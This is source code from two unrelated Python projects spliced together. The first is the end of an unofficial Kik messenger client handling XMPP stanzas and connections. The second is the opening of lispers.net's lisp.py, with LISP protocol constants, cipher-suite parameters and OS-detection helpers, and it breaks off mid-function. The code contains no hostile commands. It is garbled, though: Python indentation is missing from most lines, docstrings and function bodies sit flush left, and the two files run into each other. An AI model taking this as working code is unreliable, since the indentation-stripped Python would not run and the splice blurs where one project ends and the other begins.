# self.loop.call_soon(self.loop.stop)
# -----------------
# Internal methods
# -----------------
def _send_xmpp_element(self, message: XMPPElement):
"""
Serializes and sends the given XMPP element to kik servers
        :param message: The XMPP element to send
:return: The UUID of the element that was sent
"""
while not self.connected:
log.debug("[!] Waiting for connection.")
time.sleep(0.1)
        # Serialize once and reuse the result instead of re-serializing.
        serialized = message.serialize()
        if type(serialized) is list:
            log.debug("[!] Sending multi packet data.")
            for p in serialized:
                self.loop.call_soon_threadsafe(self.connection.send_raw_data, p)
        else:
            self.loop.call_soon_threadsafe(self.connection.send_raw_data, serialized)
        return message.message_id
@run_in_new_thread
def _on_new_data_received(self, data: bytes):
"""
Gets called whenever we get a whole new XML element from kik's servers.
:param data: The data received (bytes)
"""
if data == b' ':
            # Happens every half hour. Some kind of keep-alive? The server disconnects after the 10th one if unanswered, so send it back.
self.loop.call_soon_threadsafe(self.connection.send_raw_data, b' ')
return
xml_element = BeautifulSoup(data.decode('utf-8'), features='xml')
xml_element = next(iter(xml_element)) if len(xml_element) > 0 else xml_element
# choose the handler based on the XML tag name
if xml_element.name == "k":
self._handle_received_k_element(xml_element)
if xml_element.name == "iq":
self._handle_received_iq_element(xml_element)
elif xml_element.name == "message":
self._handle_xmpp_message(xml_element)
elif xml_element.name == 'stc':
self.callback.on_captcha_received(login.CaptchaElement(xml_element))
def _handle_received_k_element(self, k_element: BeautifulSoup):
"""
The 'k' element appears to be kik's connection-related stanza.
It lets us know if a connection or a login was successful or not.
:param k_element: The XML element we just received from kik.
"""
if k_element['ok'] == "1":
self.connected = True
if 'ts' in k_element.attrs:
# authenticated!
log.info("[+] Authenticated successfully.")
self.authenticated = True
self.authenticator.sendStanza()
self.callback.on_authenticated()
elif self.should_login_on_connection:
self.login(self.username, self.password)
self.should_login_on_connection = False
else:
self.callback.on_connection_failed(login.ConnectionFailedResponse(k_element))
def _handle_received_iq_element(self, iq_element: BeautifulSoup):
"""
        The 'iq' (info/query) stanza in XMPP represents the request/response elements.
We send an iq stanza to request for information, and we receive an iq stanza in response to this request,
with the same ID attached to it.
For a great explanation of this stanza: http://slixmpp.readthedocs.io/api/stanza/iq.html
:param iq_element: The iq XML element we just received from kik.
"""
if iq_element.error and "bad-request" in dir(iq_element.error):
raise Exception("Received a Bad Request error for stanza with ID {}".format(iq_element.attrs['id']))
query = iq_element.query
xml_namespace = query['xmlns'] if 'xmlns' in query.attrs else query['xmlns:']
self._handle_response(xml_namespace, iq_element)
def _handle_response(self, xmlns, iq_element):
"""
Handles a response that we receive from kik after our initiated request.
Examples: response to a group search, response to fetching roster, etc.
:param xmlns: The XML namespace that helps us understand what type of response this is
:param iq_element: The actual XML element that contains the response
"""
if xmlns == 'kik:iq:check-unique':
xmlns_handlers.CheckUsernameUniqueResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'jabber:iq:register':
xmlns_handlers.RegisterOrLoginResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'jabber:iq:roster':
xmlns_handlers.RosterResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:iq:friend' or xmlns == 'kik:iq:friend:batch':
xmlns_handlers.PeersInfoResponseHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:iq:xiphias:bridge':
xmlns_handlers.XiphiasHandler(self.callback, self).handle(iq_element)
elif xmlns == 'kik:auth:cert':
self.authenticator.handle(iq_element)
def _handle_xmpp_message(self, xmpp_message: BeautifulSoup):
"""
        An XMPP 'message' in the case of Kik is the actual stanza we receive when someone sends us a message
        (whether groupchat or not), starts typing, stops typing, reads our message, etc.
Examples: http://slixmpp.readthedocs.io/api/stanza/message.html
:param xmpp_message: The XMPP 'message' element we received
"""
self._handle_kik_event(xmpp_message)
def _handle_kik_event(self, xmpp_element):
"""
Handles kik "push" events, like a new message that arrives.
:param xmpp_element: The XML element that we received with the information about the event
"""
if 'xmlns' in xmpp_element.attrs:
# The XML namespace is different for iOS and Android, handle the messages with their actual type
if xmpp_element['type'] == "chat":
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
elif xmpp_element['type'] == "groupchat":
xmlns_handlers.GroupXMPPMessageHandler(self.callback, self).handle(xmpp_element)
else:
pass
elif xmpp_element['type'] == 'receipt':
if xmpp_element.g:
self.callback.on_group_receipts_received(chatting.IncomingGroupReceiptsEvent(xmpp_element))
else:
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
else:
# iPads send messages without xmlns, try to handle it as jabber:client
xmlns_handlers.XMPPMessageHandler(self.callback, self).handle(xmpp_element)
def _on_connection_lost(self):
"""
Gets called when the connection to kik's servers is unexpectedly lost.
It could be that we received a connection reset packet for example.
:return:
"""
self.connected = False
log.info("[-] The connection was lost")
def _kik_connection_thread_function(self):
"""
The Kik Connection thread main function.
Initiates the asyncio loop and actually connects.
"""
        # If there is already a connection going, then wait for it to stop
if self.loop and self.loop.is_running():
self.loop.call_soon_threadsafe(self.connection.close)
log.debug("[!] Waiting for the previous connection to stop.")
while self.loop.is_running():
log.debug("[!] Still Waiting for the previous connection to stop.")
time.sleep(1)
log.info("[+] Initiating the Kik Connection thread and connecting to kik server...")
# create the connection and launch the asyncio loop
self.connection = KikConnection(self.loop, self)
coro = self.loop.create_connection(lambda: self.connection, HOST, PORT, ssl=True)
self.loop.run_until_complete(coro)
log.debug("[!] Running main loop")
self.loop.run_forever()
log.debug("[!] Main loop ended.")
self.callback.on_disconnected()
def get_jid(self, username_or_jid):
if '@' in username_or_jid:
# this is already a JID.
return username_or_jid
else:
username = username_or_jid
# first search if we already have it
if self.get_jid_from_cache(username) is None:
# go request for it
self._new_user_added_event.clear()
self.request_info_of_users(username)
if not self._new_user_added_event.wait(5.0):
raise TimeoutError("Could not get the JID for username {} in time".format(username))
return self.get_jid_from_cache(username)
def get_jid_from_cache(self, username):
for user in self._known_users_information:
if user.username.lower() == username.lower():
return user.jid
return None
def _set_up_logging(self, log_level):
log_formatter = logging.Formatter('[%(asctime)-15s] %(levelname)-6s (thread %(threadName)-10s): %(message)s')
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
kik_logger = logging.getLogger('kik_unofficial')
if len(kik_logger.handlers) == 0:
file_handler = logging.FileHandler("kik-debug.log")
file_handler.setFormatter(log_formatter)
file_handler.setLevel(logging.DEBUG)
kik_logger.addHandler(file_handler)
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setLevel(log_level)
console_handler.setFormatter(log_formatter)
kik_logger.addHandler(console_handler)
logging.getLogger('asyncio').setLevel(logging.WARNING)
@staticmethod
def is_group_jid(jid):
if '@talk.kik.com' in jid:
return False
elif '@groups.kik.com' in jid:
return True
else:
raise exceptions.KikApiException('Not a valid jid')
class KikConnection(Protocol):
def __init__(self, loop, api: KikClient):
self.api = api
self.loop = loop
self.partial_data = None # type: bytes
self.partial_data_start_tag = None # type: str
self.transport = None # type: Transport
def connection_made(self, transport: Transport):
self.transport = transport
log.info("[!] Connected.")
self.api._on_connection_made()
def data_received(self, data: bytes):
log.debug("[+] Received raw data: %s", data)
if self.partial_data is None:
if len(data) < 16384:
self.loop.call_soon_threadsafe(self.api._on_new_data_received, data)
else:
log.debug("Multi-packet data, waiting for next packet.")
start_tag, is_closing = self.parse_start_tag(data)
self.partial_data_start_tag = start_tag
self.partial_data = data
else:
if self.ends_with_tag(self.partial_data_start_tag, data):
self.loop.call_soon_threadsafe(self.api._on_new_data_received, self.partial_data + data)
self.partial_data = None
self.partial_data_start_tag = None
else:
log.debug("[!] Waiting for another packet, size={}".format(len(self.partial_data)))
self.partial_data += data
@staticmethod
def parse_start_tag(data: bytes) -> Tuple[bytes, bool]:
tag = data.lstrip(b'<')
tag = tag.split(b'>')[0]
tag = tag.split(b' ')[0]
is_closing = tag.endswith(b'/')
if is_closing:
tag = tag[:-1]
return tag, is_closing
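    # Illustration (assumed inputs): parse_start_tag(b'<iq to="x" id="1">')
    # returns (b'iq', False), while parse_start_tag(b'<ping/>') returns
    # (b'ping', True).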
@staticmethod
def ends_with_tag(expected_end_tag: bytes, data: bytes):
return data.endswith(b'</' + expected_end_tag + b'>')
def connection_lost(self, exception):
self.loop.call_soon_threadsafe(self.api._on_connection_lost)
self.loop.stop()
def send_raw_data(self, data: bytes):
log.debug("[+] Sending raw data: %s", data)
self.transport.write(data)
def close(self):
if self.transport:
self.transport.write(b'</k>')
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by an instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
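#
# Illustratively (hypothetical values), an encap entry might look like:
# lisp_crypto_keys_by_rloc_encap["10.0.0.1:4341"] = [None, keys, None, None]
# i.e. a 4-slot array indexed by key-id, with slot 1 holding the keys
# negotiated with that RLOC and port.
#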
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. For NAT-traversal, register only reachable
# RTRs, as determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, we write specific information
# to, say, a Broadcom chip that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in an Info-Request; the value is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Array to store the last LISP_FLOW_LOG_SIZE flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcap-capture IPv4 fragments. They can come to
# the ETR when IPv6 is encapsulated in IPv4 and we have an MTU violation for
# the encapsulated packet. The array is indexed by the IPv4 ident field and
# contains an array of packet buffers. Once all fragments have arrived, the
# IP header is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID-target they are requesting. The key is the EID-prefix in string
# format with bracketed instance-ID included, in slash format. The value of
# the dictionary array is a dictionary array of ITR addresses in string
# format.
#
lisp_pubsub_cache = {}
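#
# Illustrative entry (hypothetical values, not executed): an ITR at
# 10.2.2.2 subscribed to EID-prefix 10.0.0.0/8 in instance-ID 1000 would
# be stored roughly as:
#
#   lisp_pubsub_cache["[1000]10.0.0.0/8"]["10.2.2.2"] = <subscriber state>
#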
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to store NAT translated address state in an RTR when an ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "rloc-prefix", and "instance-id". If a
# keyword is not in a dictionary array, its value is wildcarded. The
# eid-prefix and rloc-prefix values are lisp_address() instances so longest
# match lookups can be performed. The instance-id value is a 2-element array
# holding the low and high values of a range; both elements hold the same
# value when a single instance-ID is configured.
#
lisp_glean_mappings = []
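#
# Illustrative entry (hypothetical values, not executed), matching EIDs in
# 10.0.0.0/8 gleaned from RLOCs in 192.168.1.0/24 for instance-IDs 1000
# through 2000:
#
#   { "eid-prefix" : <lisp_address for 10.0.0.0/8>,
#     "rloc-prefix" : <lisp_address for 192.168.1.0/24>,
#     "instance-id" : [1000, 2000] }
#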
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60) # In units of minutes (1 day)
LISP_REGISTER_TTL = 3 # In units of minutes
LISP_SHORT_TTL = 1 # In units of minutes
LISP_NMR_TTL = 15 # In units of minutes
LISP_GLEAN_TTL = 15 # In units of minutes
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10 # In units of seconds
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is running on an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this system is running Linux (e.g., Ubuntu or Fedora).
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_process_logfile
#
# Check to see if the logfile exists. If not, either it is startup time and
# we need to create one, or another procedure rotated the file out of the
# directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or dino-macbook.wp.comcast.
# net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed.
#
def lprint(*args):
if (lisp_debug_logging == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args: print arg,
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Makes it easy to find the location of temporary
# "printf" code so it can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
